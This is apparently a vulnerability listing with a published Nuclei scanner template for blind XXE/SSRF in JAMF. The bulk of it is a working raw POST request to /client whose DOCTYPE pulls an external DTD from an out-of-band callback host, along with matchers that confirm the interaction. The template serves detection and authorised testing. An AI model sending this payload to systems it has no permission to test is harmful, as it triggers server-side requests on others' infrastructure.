漏洞描述
Blind XXE / SSRF exists in JAMF which is a company that provides enterprise-level software solutions for managing and securing Apple devices in organizations.
jamf-blind-xxe: JAMF Blind XXE / SSRF
PoC代码[已公开]
id: jamf-blind-xxe
info:
name: JAMF Blind XXE / SSRF
author: pdteam
severity: medium
description: Blind XXE / SSRF exists in JAMF which is a company that provides enterprise-level software solutions for managing and securing Apple devices in organizations.
reference:
- https://www.synack.com/blog/a-deep-dive-into-xxe-injection/
metadata:
max-request: 1
tags: xxe,ssrf,jamf,vuln
http:
- raw:
- |
POST /client HTTP/1.1
Host: {{Hostname}}
Content-Type: application/xml
<?xml version='1.0' encoding='UTF-8' standalone="no"?>
<!DOCTYPE jamfMessage SYSTEM "http://{{interactsh-url}}/test.xml">
<ns2:jamfMessage xmlns:ns3="http://www.jamfsoftware.com/JAMFCommunicationSettings" xmlns:ns2="http://www.jamfsoftware.com/JAMFMessage">
<device>
<uuid>&test;</uuid>
<macAddresses />
</device>
<application>com.jamfsoftware.jamfdistributionserver</application>
<messageTimestamp>{{unix_time()}}</messageTimestamp>
<content xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:type="ns2:ResponseContent">
<uuid>00000000-0000-0000-0000-000000000000</uuid>
<commandType>com.jamfsoftware.jamf.distributionserverinventoryrequest</commandType>
<status>
<code>1999</code>
<timestamp>{{unix_time()}}</timestamp>
</status>
<commandData>
<distributionServerInventory>
<ns2:distributionServerID>34</ns2:distributionServerID>
</distributionServerInventory>
</commandData>
</content>
</ns2:jamfMessage>
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol # Confirms the DNS Interaction
words:
- "http"
- type: word
words:
- "com.jamfsoftware.jss"
# digest: 490a00463044022031ec9f3cb4798032de8b39189098d55cf43f6c6465b9086ce8b138ec926cd53302202a14b52c11cd4cd8e3ee73364f2d4c48542c25dcfa2829048122a853941ae209:922c64590222798bb761d5b6d8e72950